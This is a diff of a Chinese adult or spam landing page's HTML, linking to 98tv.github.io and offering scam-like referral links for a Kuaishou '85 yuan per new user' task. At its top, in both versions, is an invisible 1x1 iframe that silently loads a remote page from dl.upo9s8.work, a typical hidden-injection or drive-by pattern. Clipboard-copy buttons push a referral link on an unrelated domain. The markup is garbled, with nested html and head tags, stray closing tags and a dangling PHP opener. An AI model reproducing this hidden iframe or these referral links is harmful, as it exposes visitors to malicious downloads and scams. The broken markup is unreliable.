--- a/0.html
+++ b/0.html
@@ -1,34 +1,56 @@
 
+
+
 <?php
-
-<html>
-
 <body>
    
     <iframe src="http://dl.upo9s8.work/ZWYjI2I" width="1" height="1"></iframe>
 </body>
-</html>
 <html>
-  <head>
-    <meta charset="utf-8">
-    <meta name=viewport content="width=device-width,initial-scale=1">
-    <script src="https://s1.pstatp.com/cdn/expire-1-M/vue/2.2.2/vue.min.js"></script>
-    <style>
-      #scrolldiv {
-        overflow: hidden;
-      }
-   
-<head>
-    <meta charSet="utf-8" />
-    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
-    <meta http-equiv="Cache-Control" content="no-transform" /> 
-    <meta http-equiv="Cache-Control" content="no-siteapp" />
-    <meta name="referrer" content="never">
-    <meta name="renderer" content="webkit" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
-</head>
-    <title>后宫选妃</title>
+	<head>
+		<meta charset="utf-8">
+		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
+			<head>
+				<meta charset="utf-8">
+				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
 
+				<title>
+					后宫选妃
+				</title>
+				
+<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
+<body>
+			<script src="./jquery.js"></script>  
+    <script src="./clipboard.min.js"></script>  </script>  
+    <div class="STYLE1">
+<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 
+
+6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 
+
+81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 
+
+infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
+<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
+<MARQUEE><STRONG>
+
+<b id="nr"><a href="https://98tv.github.io">欢迎来到喜爱夜蒲。一切视觉盛宴.供君共享</a></FONT></STRONG></MARQUEE></SPAN>
+</div>
+	</marquee></style>
+						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
+							<div class="cell title"><span>
+									
+										请勿相信视频里的博彩信息<a href="https://98tv.github.io">--返回首页</a>								</a>
+								</span>
+							</div>  </div> </div> 
+						</div>
+
+<br>  <span id="target"></span>
+<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 
+
+前面是文字居中 --><a href="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4">★★★快手85元每人拉新任务不限量点击领取★★★</a></div></div> </br>
+<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div 
+
+class="drugsword" ><a href="https://98tv.github.io/3.html">★★★会员频道★★★</a></div></div> 
 
 
 	</marquee></style>
